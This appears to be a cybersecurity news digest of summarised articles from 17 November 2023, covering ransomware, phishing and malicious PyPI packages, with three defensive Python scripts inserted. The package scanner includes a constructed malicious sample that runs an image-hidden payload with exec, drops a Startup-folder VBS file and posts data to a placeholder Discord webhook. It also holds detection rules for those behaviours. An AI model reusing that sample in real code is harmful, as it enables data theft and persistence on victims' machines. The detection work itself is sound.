Daily Brief

Find articles below; a generated summary follows each headline.

Total articles found: 11749

Checks for new stories every ~15 minutes

2023-11-17 23:36:57 bleepingcomputer CYBERCRIME Bloomberg Crypto Twitter Compromised in Discord Phishing Scam
The official Bloomberg Crypto Twitter account was hijacked to promote a phishing attack that redirected users to a fake Discord server. A scammer reused Bloomberg's old Telegram username to lure users into joining a counterfeit Bloomberg Discord server with over 33,000 members. A bot on the fake server directed users to a phishing site, disguised as a Discord verification service mimicking the legitimate AltDentifier bot, that attempted to capture Discord login credentials. The malicious link was posted from the Bloomberg Crypto Twitter account and stayed live briefly before being removed. Threat actors target crypto-community Discord servers to take over accounts and promote scams that can lead to cryptocurrency theft. Bloomberg had not commented on the incident at the time of reporting.
2023-11-17 23:26:31 bleepingcomputer RANSOMWARE Corporate Network Breaches Spike with Citrix Vulnerability Exploits
Ransomware groups are targeting exposed Citrix NetScaler ADC and Gateway devices using the Citrix Bleed exploit (CVE-2023-4966) to infiltrate organizations, steal data, and encrypt files. Victims of these attacks include Toyota Financial Services, ICBC, DP World, Allen & Overy, and Boeing. LockBit and Medusa, among other ransomware gangs, are using the vulnerability, with Medusa expanding its presence through a new data-leak blog. Although attacks dropped 15.12% in October, ransomware victim counts were still up 54.67% year on year. The BlackCat ransomware gang went a step further by filing an SEC complaint against a victim for not disclosing a cyberattack, an extortion tactic that may see more use. The FBI and CISA have issued warnings about several ransomware threats, including Royal, Rhysida, and the Scattered Spider collective. Ransomware attacks also disrupted major institutions such as the British Library and Toronto Public Library, highlighting the broad reach of these threats.
2023-11-17 23:05:56 bleepingcomputer CYBERCRIME Bloomberg Crypto Twitter Hacked for Discord Phishing Scam
The official Twitter account for Bloomberg Crypto was compromised to redirect users to a phishing site. Attackers set up a fake Telegram channel and Discord server to lure victims into providing Discord credentials. The fake Discord server used a bot to prompt verification through a phishing website masquerading as AltDentifier. Victims were given 30 minutes to 'verify' their account on the bogus website to gain full server access. The phishing link aimed to steal Discord login details under the guise of server security measures. The malicious link was identified and removed within 30 minutes after a crypto fraud investigator reported it. Such phishing attacks on crypto communities are common, with scammers seeking to steal cryptocurrency assets. Bloomberg has not yet commented on the situation publicly.
2023-11-17 18:09:55 theregister CYBERCRIME LockBit Overhauls Negotiation Strategy Amid Affiliate Discontent
LockBit ransomware group's leadership adjusts negotiation tactics due to affiliates' unsatisfactory ransom collection rates. The group experienced a decrease in ransom payments, citing less-experienced affiliates offering undue discounts and inconsistent negotiation outcomes. LockBit now enforces standardized guidelines on setting initial ransom amounts based on victim's annual revenue and limits discounts to a maximum of 50%. Affiliates previously had autonomy in negotiations, leading to victims refusing payment after observing the potential for steep discounts. Incident responders are documenting negotiation behaviors, which influences victims' decisions to reject payment offers if they perceive a lack of fairness. LockBit issued a survey prior to implementing new rules to guide all future negotiations with victims starting October 1, 2023. Security analysts emphasize the importance of monitoring ransomware group tactics as every negotiation carries unique aspects due to the affiliate-driven organizational structure.
2023-11-17 16:47:52 bleepingcomputer CYBERCRIME Yamaha Motor Philippines Hit by Sophisticated Ransomware Attack
Yamaha Motor's Philippines subsidiary suffered a ransomware attack that led to unauthorized access and a partial leak of employee data. External security experts were engaged immediately after the incident was detected on October 25 to investigate and mitigate the damage. The intrusion was limited to a single server at Yamaha Motor Philippines, and no impact on the headquarters or other group subsidiaries has been reported. The incident was reported to Philippine authorities, and efforts are underway to determine its full impact. The INC RANSOM gang has claimed responsibility, posting roughly 37GB of allegedly stolen data on its dark web leak site. INC RANSOM, which has run double-extortion attacks since August 2023, typically breaches networks via spear-phishing or by exploiting vulnerabilities such as Citrix NetScaler CVE-2023-3519. The actors then move laterally within the network, steal data, and encrypt systems before demanding a ransom in return for decryption and other assurances. Victims are given a 72-hour ultimatum to begin negotiations, with the threat of public data disclosure if they refuse to pay.
2023-11-17 16:06:46 bleepingcomputer CYBERCRIME Multiple Governments Targeted by Zero-Day Exploit in Zimbra Email Server
Google's Threat Analysis Group (TAG) identified a zero-day vulnerability in the Zimbra Collaboration email server that was used to compromise government systems. Attackers exploited the flaw, CVE-2023-37580, to steal emails, credentials, and authentication tokens from government entities in several countries. The vulnerability, a reflected cross-site scripting (XSS) issue, was exploited by at least four separate threat actors beginning on June 29. Attackers auto-forwarded victims' email and steered them to phishing pages before Zimbra released an official patch. Google alerted Zimbra to the active exploitation, prompting an emergency hotfix that was later followed by the official patch. The report highlights the importance of timely security updates and the risk posed even by medium-severity vulnerabilities. Similar XSS vulnerabilities have been used against mail servers before, underlining a pattern of exploiting email platforms for cyber espionage.
2023-11-17 15:04:57 theregister MISCELLANEOUS SonicWall Acquires Solutions Granted to Expand Cybersecurity Services
SonicWall, a cybersecurity firm, has acquired Solutions Granted, a Virginia-based Managed Security Service Provider (MSSP). The acquisition aims to meet customer demand for managed detection and response (MDR) and extended detection and response (XDR) services. SonicWall is now poised to offer U.S.-based Security Operations Center (SOC)-as-a-service for the first time. Solutions Granted's integration will provide capabilities in endpoint, cloud management, vulnerability assessment, and proven success in the managed security space. CEO Bob VanKirk emphasized the acquisition's crucial role in SonicWall's growth strategy and the importance of enhancing support for their partners in the cybersecurity market. All employees of Solutions Granted will join SonicWall post-acquisition, maintaining team integrity which both companies view as essential. SonicWall plans to develop an EU-based SOC to better address European partner needs while considering multiple factors such as language support and timezone coverage.
2023-11-17 14:13:20 bleepingcomputer CYBERCRIME CISA Alerts of Exploit Risks for Windows, Sophos, Oracle Bugs
The U.S. Cybersecurity & Infrastructure Security Agency (CISA) warns of active exploitation of vulnerabilities in Microsoft, Sophos, and Oracle products. CISA added these flaws to its Known Exploited Vulnerabilities (KEV) catalog, emphasizing the need for prompt action, and federal agencies must apply the relevant updates by December 7. CVE-2023-36584, a Windows Mark of the Web (MotW) security feature bypass, was fixed in the October 2023 Patch Tuesday updates but was not initially marked as actively exploited. CVE-2023-1671, a critical (CVSS 9.8) pre-authentication command injection bug in Sophos Web Appliance, allows remote code execution on unpatched versions. Sophos Web Appliance reached end of life on July 20, and customers are urged to migrate to Sophos Firewall for continued web protection. Although the KEV catalog's deadlines bind only U.S. federal agencies, it also serves as a global alarm for organizations to patch these vulnerabilities.
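As an added example (not part of the article and not CISA tooling), the following Python script shows how a defender can check an asset inventory against a KEV-format feed and rank exposures by CISA due date, with ransomware-linked entries first. The feed records and the inventory are constructed samples that only mirror the public feed's field names; the dates and host names are illustrative assumptions.

```python
"""Triage an asset inventory against a CISA KEV-format feed.

Added example; not code from the article or from CISA. The record fields
(cveID, vendorProject, product, dateAdded, dueDate, knownRansomwareCampaignUse)
follow the public KEV JSON layout, but the entries and the inventory below
are CONSTRUCTED samples for illustration.
"""
import json
from datetime import date

# Constructed stand-in for the KEV feed. The live catalogue is published at
# https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
SAMPLE_KEV_JSON = json.dumps({
    "title": "KEV sample (constructed)",
    "vulnerabilities": [
        {"cveID": "CVE-2023-36584", "vendorProject": "Microsoft",
         "product": "Windows", "dateAdded": "2023-11-16",
         "dueDate": "2023-12-07", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2023-1671", "vendorProject": "Sophos",
         "product": "Web Appliance", "dateAdded": "2023-11-16",
         "dueDate": "2023-12-07", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2023-4966", "vendorProject": "Citrix",
         "product": "NetScaler ADC and Gateway", "dateAdded": "2023-10-18",
         "dueDate": "2023-11-08", "knownRansomwareCampaignUse": "Known"},
    ],
})

# Constructed inventory (hypothetical hosts): CVEs each asset is still exposed
# to, as a vulnerability scanner export would report them.
SAMPLE_INVENTORY = [
    {"name": "vpn-gw-01", "cves": ["CVE-2023-4966"]},
    {"name": "ws-finance-07", "cves": ["CVE-2023-36584", "CVE-2023-99999"]},
    {"name": "mail-relay", "cves": ["CVE-2023-99999"]},  # not in KEV
]

# The "today" used for the sample run below (the brief's publication date).
REPORT_DATE = date(2023, 11, 17)


def load_kev(raw_json: str) -> dict:
    """Index the catalogue by CVE ID so lookups are O(1)."""
    feed = json.loads(raw_json)
    return {entry["cveID"]: entry for entry in feed["vulnerabilities"]}


def triage(kev: dict, inventory: list, today: date) -> list:
    """Return KEV-listed exposures ordered by urgency.

    Sort key: days until the CISA due date (negative = overdue), then
    ransomware-linked entries ahead of ties.
    """
    findings = []
    for asset in inventory:
        for cve in asset["cves"]:
            entry = kev.get(cve)
            if entry is None:
                continue  # not in KEV: exploitation status unknown, out of scope here
            due = date.fromisoformat(entry["dueDate"])
            findings.append({
                "asset": asset["name"],
                "cve": cve,
                "product": f'{entry["vendorProject"]} {entry["product"]}',
                "due": due.isoformat(),
                "days_left": (due - today).days,
                "ransomware": entry["knownRansomwareCampaignUse"] == "Known",
            })
    findings.sort(key=lambda f: (f["days_left"], not f["ransomware"]))
    return findings


def overdue(findings: list) -> list:
    """Subset of findings whose CISA deadline has already passed."""
    return [f for f in findings if f["days_left"] < 0]


if __name__ == "__main__":
    report = triage(load_kev(SAMPLE_KEV_JSON), SAMPLE_INVENTORY, REPORT_DATE)
    for f in report:
        state = "OVERDUE" if f["days_left"] < 0 else f"{f['days_left']}d left"
        flag = " [ransomware]" if f["ransomware"] else ""
        print(f"{f['asset']:14} {f['cve']:16} {f['product']:28} due {f['due']} ({state}){flag}")
```

In practice the feed is fetched and cached daily and the inventory comes from the scanner; the sort key is the point: an overdue, ransomware-linked edge device outranks a workstation bug with three weeks left, whatever their CVSS scores say.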
2023-11-17 13:41:57 bleepingcomputer RANSOMWARE British Library Hit by Ransomware Attack, Disrupts Services
The British Library has confirmed a ransomware attack causing significant ongoing service outages. Over 11 million yearly online visitors and 16,000 daily users of its collections are affected by the outage. The library's massive collection and the addition of 3 million new items annually underscore the scale of the impact. Details on the specific ransomware operation involved or the extent of data compromise have not been disclosed. The incident has led to an ongoing forensic investigation supported by the National Cyber Security Centre and other authorities. Despite the attack, public events continue as planned, and temporary passes for onsite services are being issued. The Business & IP Centre is open to support businesses, though some digital services are unavailable.
2023-11-17 13:31:36 thehackernews MALWARE WinSCP Users Targeted by Malware Through Fake Google Ads
Cybercriminals are using fake Google ads to trick users into downloading malware disguised as the WinSCP file-transfer software. Security firm Securonix identified the campaign and named it SEO#LURKER. Victims are redirected from a promoted ad to a compromised WordPress site and from there to a malicious phishing site. A referrer check decides whether a visitor receives the malware payload or is bounced to a Rick Astley video on YouTube. The malware arrives in a ZIP file and uses DLL side-loading to execute and maintain persistence on the host. Python scripts bundled with the malware establish a backdoor for further exploitation and system enumeration. The campaign appears to target mainly users in the U.S. looking to download WinSCP, using geoblocking to restrict delivery to that audience. Malvertising is a growing threat, with similar campaigns distributing various malware families and engaging in credit card skimming.
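The side-loading step is the part defenders can hunt for. As an added example (not code from the article or from Securonix), the following Python script applies a classic side-load heuristic to Sysmon-style image-load telemetry: a host binary loads an unsigned DLL from its own directory, and that directory is user-writable. The event records are constructed and simplified (each carries the loading process's signature state, which real telemetry would join from the matching process-create event); file names and paths are hypothetical, not the campaign's actual artifacts.

```python
"""Hunt for DLL side-loading in Sysmon-style image-load telemetry.

Added example; not code from the article or from Securonix. The records are
CONSTRUCTED and simplified: each combines Sysmon Event ID 7 fields (Image,
ImageLoaded, Signed, SignatureStatus) with a ProcessSigned field that real
telemetry would join from the matching Event ID 1 (process create) record.
"""
import ntpath

# Roots that are not user-writable by default; a DLL loaded from here is not a
# side-load candidate under this heuristic (lower-case, backslash form).
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed events. Event 2 models the ZIP-in-Downloads pattern: a signed host
# executable loads an unsigned DLL sitting beside it. Names are hypothetical.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": "C:\\Program Files\\WinSCP\\WinSCP.exe",
     "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid", "ProcessSigned": "true"},
    {"EventID": 7, "Image": "C:\\Users\\alice\\Downloads\\WinSCP-Setup\\setup.exe",
     "ImageLoaded": "C:\\Users\\alice\\Downloads\\WinSCP-Setup\\python311.dll",
     "Signed": "false", "SignatureStatus": "Unavailable", "ProcessSigned": "true"},
    {"EventID": 7, "Image": "C:\\Program Files\\Vendor\\app.exe",
     "ImageLoaded": "C:\\Program Files\\Vendor\\helper.dll",
     "Signed": "false", "SignatureStatus": "Unavailable", "ProcessSigned": "true"},
    {"EventID": 1, "Image": "C:\\Users\\alice\\Downloads\\WinSCP-Setup\\setup.exe",
     "ProcessSigned": "true"},
]


def in_user_writable_dir(path: str) -> bool:
    """True unless the path lives under a root that is not user-writable by default.
    ntpath.normcase lower-cases and normalises slashes, so it works off-Windows too."""
    return not ntpath.normcase(path).startswith(TRUSTED_ROOTS)


def same_directory(a: str, b: str) -> bool:
    return ntpath.normcase(ntpath.dirname(a)) == ntpath.normcase(ntpath.dirname(b))


def is_sideload_candidate(event: dict) -> bool:
    """Classic side-load shape: a host binary loads an untrusted DLL from its own
    directory, and that directory is one an attacker can write to."""
    if event.get("EventID") != 7:
        return False
    dll_untrusted = event["Signed"] != "true" or event["SignatureStatus"] != "Valid"
    return (dll_untrusted
            and same_directory(event["Image"], event["ImageLoaded"])
            and in_user_writable_dir(event["ImageLoaded"]))


def hunt(events: list) -> list:
    """Return (process, dll, host_signed) for each candidate. A signed host is the
    stronger signal: the attacker is borrowing a legitimate binary's reputation."""
    return [(e["Image"], e["ImageLoaded"], e["ProcessSigned"] == "true")
            for e in events if is_sideload_candidate(e)]


if __name__ == "__main__":
    for proc, dll, host_signed in hunt(SAMPLE_EVENTS):
        print(f"side-load candidate: {proc} -> {dll} (signed host: {host_signed})")
```

The third record shows the intended false-negative: an unsigned helper DLL under Program Files is common for legitimate software and needs a different rule (for example, a first-seen hash or a write to that directory by a non-installer process).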
2023-11-17 12:39:38 thehackernews CYBERCRIME FCC Adopts New Rules to Combat SIM Swapping and Port-Out Fraud
The FCC is enforcing new regulations to protect consumers against SIM swapping and port-out fraud. These scams involve unauthorized SIM changes and number porting, putting personal data and accounts at risk. Providers must now use secure authentication before transferring numbers and immediately notify customers of SIM or port-out requests. SIM swapping has been utilized by cybercriminals to bypass two-factor authentication and hijack online accounts. FCC Commissioner Geoffrey Starks emphasizes the necessity for secure verification and privacy from wireless carriers. In response to these threats, the FCC is investigating how AI might both combat and exacerbate robocalls and robotexts.
2023-11-17 10:31:34 thehackernews MISCELLANEOUS Expert Webinar Tackles Emerging Cloud Security Challenges
The webinar focuses on cloud security, addressing emerging threats such as Zenbleed, Kubernetes attacks, and sophisticated Advanced Persistent Threats (APTs). Led by Jose Hernandez from Lacework Labs, the session offers practical strategies to protect cloud infrastructures. The session is geared toward IT professionals at all levels, providing strategic guidance and actionable insights. The collaboration between The Hacker News and Lacework Labs seeks to empower organizations with expert knowledge on cloud security. Participants are encouraged to register for the webinar to gain the latest information and techniques to safeguard their cloud environment. The webinar highlights the importance of continuous learning and adaptation in the rapidly evolving landscape of cloud security.
2023-11-17 10:00:44 thehackernews MALWARE Malicious Python Packages Discovered on PyPI Threaten User Security
An unknown attacker used PyPI to distribute 27 malware-laden packages posing as popular Python libraries. The packages used steganography to hide payloads inside image files, making the attack harder to spot. Download counts run into the thousands, with most downloads originating from countries including the U.S., China, and Germany. The malware aims to establish persistence, steal sensitive data, and access cryptocurrency wallets. Two packages, pystob and pywool, are noted for exfiltrating stolen data to a Discord webhook and seeking persistence via a VBS file in the Windows Startup folder. Separately, ReversingLabs reports protestware npm packages that display political messages depending on the geographic location of the host, and GitGuardian identified numerous secrets (API keys, SSH keys, etc.) exposed in PyPI projects, heightening the risk of unauthorized access or social engineering. In response to the growing threat, U.S. agencies including CISA, NSA, and ODNI have issued new guidance for software developers on mitigating software supply chain risks.
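The behaviours named above (a payload decoded from an image and handed to exec, a Discord webhook for exfiltration, a VBS file in the Startup folder) are all visible in package source before anything is installed. As an added example (not code from the article or from PyPI), the following Python script is a pre-install static scan for exactly those indicators. The two package sources it scans are constructed stand-ins, not the real pystob or pywool code, and the names and URLs in them are hypothetical.

```python
"""Pre-install static scan of a Python package for the behaviours named in
the PyPI campaign: image-hidden payloads handed to exec/eval, exfiltration
to a Discord webhook, and persistence via a VBS file in the Startup folder.

Added example; not code from the article or from PyPI. The two module
sources below are CONSTRUCTED stand-ins, not the real pystob or pywool
code. The rules are a triage heuristic: a hit means "read this package
before installing it", not "this package is malware".
"""
import ast
import re

RULES = {
    "discord_webhook": re.compile(r"discord(app)?\.com/api/webhooks/", re.I),
    "startup_folder":  re.compile(r"[\\/]+startup\b", re.I),
    "vbs_dropper":     re.compile(r"\.vbs\b", re.I),
    "image_file":      re.compile(r"\.(png|jpe?g|gif|bmp)\b", re.I),
}
DYNAMIC_EXEC = {"exec", "eval"}


def dynamic_exec_calls(tree: ast.AST) -> int:
    """Count bare exec()/eval() calls; a payload decoded at runtime must pass
    through one of these (or compile()) to run."""
    return sum(1 for node in ast.walk(tree)
               if isinstance(node, ast.Call)
               and isinstance(node.func, ast.Name)
               and node.func.id in DYNAMIC_EXEC)


def scan_source(source: str) -> set:
    """Return the set of rule names that fire for one module's source text."""
    hits = {name for name, rx in RULES.items() if rx.search(source)}
    try:
        tree = ast.parse(source)
    except SyntaxError:
        hits.add("unparseable")  # obfuscated, truncated, or not Python at all
        return hits
    if dynamic_exec_calls(tree):
        hits.add("dynamic_exec")
    # An image reference alone is normal (docs, assets). Image plus runtime
    # exec in the same module is the steganography pattern from the report.
    if "image_file" in hits and "dynamic_exec" in hits:
        hits.add("image_payload")
    hits.discard("image_file")
    return hits


# Constructed sample resembling the reported behaviour (hypothetical names/URLs).
MALICIOUS_SAMPLE = r'''
import base64, os, urllib.request
from PIL import Image
img = Image.open("assets/logo.png")
blob = base64.b64decode(bytes(px[0] for px in img.getdata())[:4096])
exec(blob)
target = os.path.join(os.environ["APPDATA"],
                      r"Microsoft\Windows\Start Menu\Programs\Startup", "upd.vbs")
urllib.request.urlopen("https://discord.com/api/webhooks/1234/abcd", data=b"{}")
'''

# Constructed benign module for comparison.
BENIGN_SAMPLE = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(f"{label}: {sorted(scan_source(src)) or 'no findings'}")
```

Run it over every .py file in a downloaded sdist or wheel (setup.py and __init__.py first, since those execute at install or import time) before the package reaches a build host; the combination rule keeps image assets from flooding the results.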
2023-11-17 07:32:53 thehackernews CYBERCRIME Scattered Spider Cybercrime Group Targeting Multifactor Authentication
U.S. cybersecurity and intelligence agencies have issued a warning about a cybercriminal group known as Scattered Spider. Scattered Spider utilizes sophisticated social engineering, such as phishing and SIM swapping, to steal data and bypass multi-factor authentication. The group employs BlackCat/ALPHV ransomware and a variety of remote access tools and malware like AveMaria, Raccoon Stealer, and Vidar Stealer. Microsoft considers Scattered Spider one of the most dangerous financial criminal groups, and the FBI is aware of the identities of some members. The group is part of the Gen Z cybercrime ecosystem called the Com, which has engaged in swatting attacks and other violent activities. Scattered Spider has been observed monitoring incident response efforts to adapt to defense measures and maintain access. The U.S. government advises the implementation of phishing-resistant multi-factor authentication and robust incident recovery strategies to mitigate such threats.
2023-11-17 06:00:59 theregister DATA BREACH Samsung UK Customer Data Exposed in Year-Long Breach
Samsung Electronics UK has informed customers of a data breach affecting purchases made from July 1, 2019, to June 30, 2020. An unauthorized individual exploited a third-party application vulnerability, leading to the exposure of names, phone numbers, and addresses. This incident marks the third major data breach for Samsung globally in the past two years. The breach follows a serious incident in March 2022, where nearly 200GB of internal Samsung data was leaked by extortion group Lapsus$. Another breach occurred in the US in July 2022, with customer names, contact information, and product registration details compromised. Following these security incidents, a class action lawsuit was filed against Samsung, claiming the company collects and inadequately protects personal data. The lawsuit highlights customers being coerced into sharing data to maintain functionality of Samsung products, such as TVs and printers. Samsung has not provided a comment on the situation at the time of reporting.